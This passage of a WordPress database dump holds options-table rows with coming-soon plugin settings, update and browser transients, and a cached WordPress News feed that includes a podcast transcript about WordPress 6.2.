name\\\":\\\"tiktok\\\",\\\"url\\\":false,\\\"active\\\":\\\"1\\\",\\\"hidden\\\":\\\"1\\\",\\\"order\\\":27},{\\\"name\\\":\\\"imdb\\\",\\\"url\\\":false,\\\"active\\\":\\\"1\\\",\\\"hidden\\\":\\\"1\\\",\\\"order\\\":28},{\\\"name\\\":\\\"wikipedia\\\",\\\"url\\\":false,\\\"active\\\":\\\"1\\\",\\\"hidden\\\":\\\"1\\\",\\\"order\\\":29},{\\\"name\\\":\\\"twitch\\\",\\\"url\\\":false,\\\"active\\\":\\\"1\\\",\\\"hidden\\\":\\\"1\\\",\\\"order\\\":30}]','yes'),(12541,'niteoCS_overlay[opacity]','0.4','yes'),(12542,'niteoCS_page_filter','0','yes'),(12543,'niteoCS_redirect_time','0','yes'),(12544,'niteoCS_seo_img_id','','yes'),(12545,'niteoCS_seo_nocache','1','yes'),(12546,'niteoCS_seo_visibility','0','yes'),(12518,'niteoCS_font_headings_size[hardwork]','40','yes'),(12519,'niteoCS_font_headings_spacing[hardwork]','0','yes'),(12516,'niteoCS_font_content_variant[hardwork]','400','yes'),(12491,'niteoCS_activation','1','yes'),(12492,'niteoCS_activation_notice','1','yes'),(12493,'niteoCS_analytics','','yes'),(12494,'niteoCS_analytics_other','','yes'),(12495,'niteoCS_analytics_status','disabled','yes'),(12496,'niteoCS_banner','2','yes'),(12497,'niteoCS_banner_color','#e5e5e5','yes'),(12498,'niteoCS_banner_gradient_one','#e5e5e5','yes'),(12499,'niteoCS_banner_gradient_two','#e5e5e5','yes'),(12500,'niteoCS_banner_id','','yes'),(12501,'niteoCS_banner_pattern','sakura','yes'),(12502,'niteoCS_banner_pattern_custom','','yes'),(12503,'niteoCS_banner_video','youtube','yes'),(12504,'niteoCS_body','','yes'),(12505,'niteoCS_body_title','SOMETHING IS HAPPENING!','yes'),(12506,'niteoCS_content_slider','0','yes'),(12507,'niteoCS_custom_css','','yes'),(12508,'niteoCS_custom_mobile_imgs','0','yes'),(12509,'niteoCS_descr','Planning for a better financial future','yes'),(12510,'niteoCS_effect_blur','0','yes'),(12511,'niteoCS_favicon_id','','yes'),(12512,'niteoCS_font_color[hardwork]','#ffffff','yes'),(12513,'niteoCS_font_content_lineheight[hardwork]','1.6','yes'),(12514,'niteoCS_font_content_size[hardwork]','17','yes'),(12515,'niteoCS_font_content_spacing[hardwork]','0','yes'),(12540,'niteoCS_overlay[gradient]','#d53369:#cbad6d','yes'),(12523,'niteoCS_footer_background[hardwork]','#000000','yes'),(12524,'niteoCS_gradient','#ED5565:#D62739','yes'),(12525,'niteoCS_login_icon','0','yes'),(12526,'niteoCS_login_icon[background]','#000000','yes'),(12527,'niteoCS_login_icon[opacity]','0.6','yes'),(12528,'niteoCS_login_icon[position]','30','yes'),(12529,'niteoCS_login_icon[radius]','0','yes'),(12530,'niteoCS_logo_custom_size','0','yes'),(12531,'niteoCS_logo_id','','yes'),(12532,'niteoCS_logo_link','http://cmdev-site1.com','yes'),(12533,'niteoCS_logo_size','100','yes'),(12534,'niteoCS_logo_type','text','yes'),(12535,'niteoCS_mobile_banner_id','','yes'),(12536,'niteoCS_overlay','solid-color','yes'),(12537,'niteoCS_overlay[color]','#0a0a0a','yes'),(12538,'niteoCS_overlay[gradient_one]','#e5e5e5','yes'),(12539,'niteoCS_overlay[gradient_two]','#e5e5e5','yes'),(271,'et_account_status','active','no'),(274,'_transient_et_updated_plugins_data','O:8:\"stdClass\":1:{s:12:\"last_checked\";i:1681217625;}','yes'),(1397,'category_children','a:0:{}','yes'),(903,'classic-editor-replace','classic','yes'),(17633,'_et_builder_da_feature_cache','a:2:{i:0;s:36:\"{\"gph\":0,\"divi\":\"4.20.4\",\"wp\":\"6.2\"}\";i:1;a:6:{s:8:\"notfound\";a:2:{s:29:\"_et_dynamic_cached_shortcodes\";a:6:{i:0;s:13:\"et_pb_section\";i:1;s:9:\"et_pb_row\";i:2;s:12:\"et_pb_column\";i:3;s:10:\"et_pb_menu\";i:4;s:11:\"et_pb_image\";i:5;s:10:\"et_pb_text\";}s:29:\"_et_dynamic_cached_attributes\";a:0:{}}s:0:\"\";a:2:{s:29:\"_et_dynamic_cached_attributes\";a:0:{}s:29:\"_et_dynamic_cached_shortcodes\";a:6:{i:0;s:13:\"et_pb_section\";i:1;s:9:\"et_pb_row\";i:2;s:12:\"et_pb_column\";i:3;s:10:\"et_pb_menu\";i:4;s:11:\"et_pb_image\";i:5;s:10:\"et_pb_text\";}}s:8:\"author/1\";a:1:{s:29:\"_et_dynamic_cached_shortcodes\";a:6:{i:0;s:13:\"et_pb_section\";i:1;s:9:\"et_pb_row\";i:2;s:12:\"et_pb_column\";i:30;s:11:\"et_pb_image\";i:33;s:10:\"et_pb_menu\";i:49;s:10:\"et_pb_text\";}}s:8:\"author/3\";a:1:{s:29:\"_et_dynamic_cached_shortcodes\";a:6:{i:0;s:13:\"et_pb_section\";i:1;s:9:\"et_pb_row\";i:2;s:12:\"et_pb_column\";i:30;s:11:\"et_pb_image\";i:33;s:10:\"et_pb_menu\";i:49;s:10:\"et_pb_text\";}}s:20:\"taxonomy/post_tag/40\";a:1:{s:29:\"_et_dynamic_cached_shortcodes\";a:6:{i:0;s:13:\"et_pb_section\";i:1;s:9:\"et_pb_row\";i:2;s:12:\"et_pb_column\";i:30;s:11:\"et_pb_image\";i:33;s:10:\"et_pb_menu\";i:49;s:10:\"et_pb_text\";}}s:19:\"taxonomy/category/1\";a:1:{s:29:\"_et_dynamic_cached_shortcodes\";a:0:{}}}}','yes'),(19096,'_site_transient_timeout_browser_c3fcd9e52fd775c43c9553a961bfc52c','1682523935','no'),(19097,'_site_transient_browser_c3fcd9e52fd775c43c9553a961bfc52c','a:10:{s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:9:\"111.0.0.0\";s:8:\"platform\";s:7:\"Windows\";s:10:\"update_url\";s:29:\"https://www.google.com/chrome\";s:7:\"img_src\";s:43:\"http://s.w.org/images/browsers/chrome.png?1\";s:11:\"img_src_ssl\";s:44:\"https://s.w.org/images/browsers/chrome.png?1\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;s:6:\"mobile\";b:0;}','no'),(13115,'action_scheduler_hybrid_store_demarkation','468','yes'),(13116,'schema-ActionScheduler_StoreSchema','6.0.1679490499','yes'),(13117,'schema-ActionScheduler_LoggerSchema','3.0.1679490499','yes'),(19054,'_site_transient_timeout_theme_roots','1681904459','no'),(19055,'_site_transient_theme_roots','a:4:{s:4:\"Divi\";s:7:\"/themes\";s:15:\"twentytwentyone\";s:7:\"/themes\";s:17:\"twentytwentythree\";s:7:\"/themes\";s:15:\"twentytwentytwo\";s:7:\"/themes\";}','no'),(14836,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:1:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:6:\"latest\";s:8:\"download\";s:57:\"https://downloads.wordpress.org/release/wordpress-6.2.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:57:\"https://downloads.wordpress.org/release/wordpress-6.2.zip\";s:10:\"no_content\";s:68:\"https://downloads.wordpress.org/release/wordpress-6.2-no-content.zip\";s:11:\"new_bundled\";s:69:\"https://downloads.wordpress.org/release/wordpress-6.2-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:3:\"6.2\";s:7:\"version\";s:3:\"6.2\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";}}s:12:\"last_checked\";i:1681902658;s:15:\"version_checked\";s:3:\"6.2\";s:12:\"translations\";a:0:{}}','no'),(19083,'_transient_timeout__et_builder_gf_feature_cache','1682005475','no'),(19084,'_transient__et_builder_gf_feature_cache','1','no'),(19086,'_transient_timeout_feed_9bbd59226dc36b9b26cd43f15694c5c3','1681962328','no');
INSERT INTO `wpfi_options` VALUES (19087,'_transient_feed_9bbd59226dc36b9b26cd43f15694c5c3','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:52:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\n \n	\n		\n		\n		\n		\n		\n		\n		\n		\n		\n	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:8:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"WordPress News\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"https://wordpress.org/news\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"The latest news about WordPress and the WordPress community\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:13:\"lastBuildDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 10 Apr 2023 11:27:43 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"en-US\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"generator\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"https://wordpress.org/?v=6.3-alpha-55659\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"image\";a:1:{i:0;a:6:{s:4:\"data\";s:11:\"\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:5:{s:3:\"url\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://s.w.org/favicon.ico?2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"WordPress News\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"https://wordpress.org/news\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"width\";a:1:{i:0;a:5:{s:4:\"data\";s:2:\"32\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:6:\"height\";a:1:{i:0;a:5:{s:4:\"data\";s:2:\"32\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}s:4:\"item\";a:10:{i:0;a:6:{s:4:\"data\";s:61:\"\n		\n		\n		\n		\n		\n				\n		\n		\n\n					\n										\n					\n		\n		\n\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"WP Briefing: Episode 53: A Look at WordPress 6.2 “Dolphy”\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"https://wordpress.org/news/2023/04/episode-53-a-look-at-wordpress-6-2-dolphy/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 10 Apr 2023 12:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:7:\"Podcast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:11:\"wp-briefing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/news/?post_type=podcast&p=14818\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:218:\"Named after the multi-instrumentalist Eric Allan Dolphy Jr., WordPress 6.2 \"Dolphy\"\'s high notes are riffed on by WordPress\'s Executive Director, Josepha Haden Chomphosy, in this 53rd episode of the WordPress Briefing.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"enclosure\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:3:\"url\";s:60:\"https://wordpress.org/news/files/2023/04/WP-Briefing-053.mp3\";s:6:\"length\";s:1:\"0\";s:4:\"type\";s:0:\"\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Chloe Bringmann\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:9292:\"\n<p>Named after the multi-instrumentalist Eric Allan Dolphy Jr., WordPress 6.2 &#8220;Dolphy&#8221;&#8216;s high notes are riffed on by WordPress&#8217;s Executive Director, Josepha Haden Chomphosy, in this 53rd episode of the WordPress Briefing.</p>\n\n\n\n<p><em><strong>Have a question you&#8217;d like answered? You can submit them to <a href=\"mailto:wpbriefing@wordpress.org\">wpbriefing@wordpress.org</a>, either written or as a voice recording.</strong></em></p>\n\n\n\n<h2 class=\"wp-block-heading\">Credits</h2>\n\n\n\n<p>Editor:&nbsp;<a href=\"https://profiles.wordpress.org/dustinhartzler/\">Dustin Hartzler</a><br>Logo:&nbsp;<a href=\"https://profiles.wordpress.org/javiarce/\" data-type=\"URL\" data-id=\"https://profiles.wordpress.org/javiarce/\">Javier Arce</a><br>Production:&nbsp;<a href=\"https://profiles.wordpress.org/cbringmann/\">Chloé Bringmann</a><br>Song: Fearless First by Kevin MacLeod </p>\n\n\n\n<h2 class=\"wp-block-heading\">Show Notes</h2>\n\n\n\n<ul>\n<li><a href=\"https://wordpress.org/news/2023/03/dolphy/\">WordPress 6.2 &#8220;Dolphy&#8221;</a></li>\n\n\n\n<li><a href=\"https://wordpress.org/news/2023/03/introducing-the-wordpress-developer-blog/\">Introducing the WordPress Developer Blog</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/project/?p=251\">WordPress Contributor Mentorship Program</a></li>\n\n\n\n<li><a href=\"https://wp.me/p2U65r-9Nl\">Call for Volunteers: Contributor Working Group</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/design/?p=11037\">Why Jazz</a></li>\n\n\n\n<li>Make Slack channels <a href=\"https://wordpress.slack.com/archives/C04QZCREJ9W\">#kidscamp</a> and <a href=\"https://wordpress.slack.com/archives/C03JNV77Y57\">#sustainability</a> </li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\">Transcript</h2>\n\n\n\n<span id=\"more-14818\"></span>\n\n\n\n<p>[Josepha Haden Chomphosy 00:00:00] </p>\n\n\n\n<p>Hello everyone, and welcome to the WordPress Briefing, the podcast where you can catch quick explanations of the ideas behind the WordPress Open Source project, some insight into the community that supports it, and get a small list of big things coming up in the next two weeks.</p>\n\n\n\n<p>I&#8217;m your host, Josepha Haden Chomphosy. Here we go.</p>\n\n\n\n<p>[00:00:28]</p>\n\n\n\n<p>The latest version of WordPress has shipped. WordPress 6.2, which was named after Eric Dolphy, was released on March 29th. And as is the way with software, there&#8217;s already a minor release underway to catch a few errant issues that folks like you have reported to us.</p>\n\n\n\n<p>It&#8217;s a big release that refines a lot of our design tools, but some of the most important changes are actually to the inserter. If you haven&#8217;t had a chance to get in there and play with it yet, here are the three things that I think you should know. </p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:01:08] </p>\n\n\n\n<p>First, the pattern browser. We&#8217;re all aware of the block inserter by now, and a lot of us probably use the quick options, the keyboard shortcuts, or that kind of inline inserter, that little black box that&#8217;s in the middle of your post.</p>\n\n\n\n<p>If you use the main inserter, that&#8217;s a blue square in the top left of the screen. If you use that to add a block, you can still add individual blocks as usual. But there&#8217;s a new way to browse patterns, and in my opinion, it is so much better. It now brings out this drawer that has like thumbnails of patterns that will work with your theme.</p>\n\n\n\n<p>And if you, like me, know what you want your site to look like, but could not in a million years figure out how to build it from scratch out of individual blocks, then this is the area for you. It was like shopping, but you don&#8217;t have to go through a checkout process at the end, and you still have what you want. It&#8217;s great.&nbsp;</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:02:00]&nbsp;</p>\n\n\n\n<p>That&#8217;s also available when you&#8217;re working on templates or template parts, so you can make changes everywhere instead of going page by page. The second thing that I think you should know is about the media browser in that same area where you browse your patterns; you can also now browse for media.</p>\n\n\n\n<p>It lets you look through the images you&#8217;ve already added to your site, but it also lets you search for openly licensed images from Openverse. And if you choose one of those images from Openverse, it inserts the proper attribution for you. You still have to add your own alt text, but that&#8217;s the fun part anyway, right?</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:02:35]&nbsp;</p>\n\n\n\n<p>And number three, a Style Book. So this thing is available in the template editing area, specifically, as is appropriate, given what it actually does. So if you&#8217;re in the template area, toward the top right of the screen is like a half moon day mode, night mode looking icon. If you click on that, you can make changes to things inside your blocks.</p>\n\n\n\n<p>But if you click on the little eyeball icon that&#8217;s just underneath it, it pulls up a style book where you can also see and edit the styles globally. If that didn&#8217;t make sense to you, don&#8217;t worry. I&#8217;ve got you. I&#8217;m about to tell you a bunch of things you can do in here. You can edit the way headings and lists and tables, quotes, and code looks all across the site. You can edit the way images, galleries, files, and videos look using custom CSS.</p>\n\n\n\n<p>Yes. Also, all across the site. And you can edit buttons, separators, and individual blocks. Say it with me &#8212; all across the site. That is not a comprehensive list. There is a ton of stuff. You can see the styles that you have applied across the whole site. You can see them in context, and you can make any changes that you need globally, which means all across the site.</p>\n\n\n\n<p>Yeah. Style Books. What will we think of next? </p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:03:54]&nbsp;</p>\n\n\n\n<p>So those are my three things I think you should know about WordPress right now. As a former WordPress builder who was never really super great with the code, this stuff makes me feel powerful. I just love these changes, and I hope you do too.</p>\n\n\n\n<p> [00:04:07]</p>\n\n\n\n<p>Which brings us now to our small list of big things. First, we just launched the Developer Blog. It&#8217;s over at developer.wordpress.org/news. It has a bunch of content on it that not only is geared specifically toward developers that are using WordPress but especially the folks who are extending WordPress. It gives you kind of an in-depth look at various changes and projects, and implementations and what goes into each one of them.</p>\n\n\n\n<p>So it gives you a bit of like this aspirational overview of stuff that you could do with WordPress and then also gives you an inside look at how you would accomplish it yourself. It&#8217;s very cool. I like it a lot. Head on over there, but we&#8217;ll have a link to the show notes below.</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:05:00]&nbsp;</p>\n\n\n\n<p>The second thing is that we have an MVP of our new mentorship program that is underway.</p>\n\n\n\n<p>It should be debuting for essentially testing any day now, a link to the posts detailing that work, just in case you want to join that important initiative. But it is an important thing for me. I think that mentorship is a key element of many of our successful contributors&#8217; onboarding journeys, a part of their story of coming to us.</p>\n\n\n\n<p>And so, creating a mentorship program that is a bit sustainable and looks toward the health of the overall project, I think, is an excellent plan.&nbsp;</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:05:38]&nbsp;</p>\n\n\n\n<p>The third thing on our small list of big things is that Matt put out a nice little post about kind of the history of why jazz has this strong background in the WordPress project. It&#8217;s a brief read. I&#8217;ll put a link to that in the show notes as well. But suffice it to say that he&#8217;s saying that jazz has a little bit of learned processes and rules but that the primary expectation is that you&#8217;re able to make of the jazz what you want. Like you get to make your own thing out of it. You get to be extemporaneous. You get to be very measured, whatever it is, that expresses what you are trying to do and what you are trying to say with it.</p>\n\n\n\n<p>That&#8217;s why he feels like jazz is such an important part of the DNA of the WordPress project. Like I said, it&#8217;s a short read. I&#8217;ll put a link to it in the show notes.</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:06:30]&nbsp;</p>\n\n\n\n<p>And finally, there are a few working groups that folks can contribute to right now. We don&#8217;t always have working groups. We generally just kind of do stuff inside individual teams. But right now, we&#8217;ve got like the kids camp group, the sustainability group, and of course, that mentorship working group that I mentioned earlier in our list.</p>\n\n\n\n<p>So if you&#8217;re wanting a little change of pace, I&#8217;d drop by their areas in the Making WordPress Slack to see if they have anything that&#8217;s up your alley. </p>\n\n\n\n<p>And that, my friends, is your small list of big things. Thank you for tuning in today for the WordPress Briefing. I&#8217;m your host, Josepha Haden Chomphosy, and I&#8217;ll see you again in a couple of weeks.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"14818\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:60:\"\n		\n		\n		\n		\n		\n				\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:37:\"The Month in WordPress – March 2023\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"https://wordpress.org/news/2023/04/the-month-in-wordpress-march-2023/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 03 Apr 2023 10:30:57 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:18:\"Month in WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:18:\"month in wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=14780\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:383:\"March saw the arrival of the first major release of 2023, WordPress 6.2 “Dolphy.” Planning for the project&#8217;s 20th anniversary continues with new celebratory updates and commemorative swag. Read on for the latest happenings in the WordPress space. Meet WordPress 6.2 “Dolphy” WordPress 6.2 “Dolphy” was released on March 29, 2023. Named after the acclaimed [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"rmartinezduque\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:15294:\"\n<p>March saw the arrival of the first major release of 2023, WordPress 6.2 “Dolphy.” Planning for the project&#8217;s 20th anniversary continues with new celebratory updates and commemorative swag. Read on for the latest happenings in the WordPress space.</p>\n\n\n\n<div style=\"height:3px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<h2 class=\"wp-block-heading\">Meet WordPress 6.2 “Dolphy”</h2>\n\n\n\n<p><strong><a href=\"https://wordpress.org/news/2023/03/dolphy/\">WordPress 6.2</a> “Dolphy” was released on March 29, 2023</strong>. Named after the acclaimed jazz multi-instrumentalist and composer<strong> </strong>Eric Allan Dolphy Jr., the latest version of WordPress further enhances the site editing experience with significant updates.</p>\n\n\n\n<p>Highlights include a reimagined Site Editor interface, a more intuitive way to manage menus, and a distraction-free writing mode. A new Block Inserter design adds integration with <a href=\"https://openverse.org/\">Openverse</a>, allowing you to easily browse and insert free, openly-licensed images and audio files into your content.</p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"581\" src=\"https://i0.wp.com/wordpress.org/news/files/2023/04/WordPress-6.2-highlight-grid.png?resize=1024%2C581&#038;ssl=1\" alt=\"Feature highlights in WordPress 6.2: Reimagined Site Editor, more ways to manage menus, a more powerful inserter, faster access to media—yours and Openverse\'s, the new Style Book, distraction-free writing, and more.\" class=\"wp-image-14782\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2023/04/WordPress-6.2-highlight-grid.png?resize=1024%2C581&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2023/04/WordPress-6.2-highlight-grid.png?resize=300%2C170&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2023/04/WordPress-6.2-highlight-grid.png?resize=768%2C436&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2023/04/WordPress-6.2-highlight-grid.png?resize=1536%2C871&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2023/04/WordPress-6.2-highlight-grid.png?resize=2048%2C1162&amp;ssl=1 2048w, https://i0.wp.com/wordpress.org/news/files/2023/04/WordPress-6.2-highlight-grid.png?w=3000&amp;ssl=1 3000w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" data-recalc-dims=\"1\" /></figure>\n\n\n\n<p>Whether you&#8217;re a content creator, designer, or developer, WordPress 6.2 has something for you. <a href=\"https://wordpress.org/news/2023/03/dolphy/\"><strong>Check out the full announcement post</strong></a> for an overview of what&#8217;s new and the <a href=\"https://make.wordpress.org/core/2023/03/09/wordpress-6-2-field-guide/\">Field Guide</a> for detailed developer notes.</p>\n\n\n\n<p>WordPress 6.2 is one of the last major releases planned for Phase 2 of the <a href=\"https://wordpress.org/about/roadmap/\">project’s development roadmap</a> and was made possible thanks to more than 600 contributors.</p>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\">\n<p><a href=\"https://make.wordpress.org/test/2023/02/07/help-test-wordpress-6-2/\"></a><a href=\"https://wordpress.org/download/\">Download WordPress 6.2 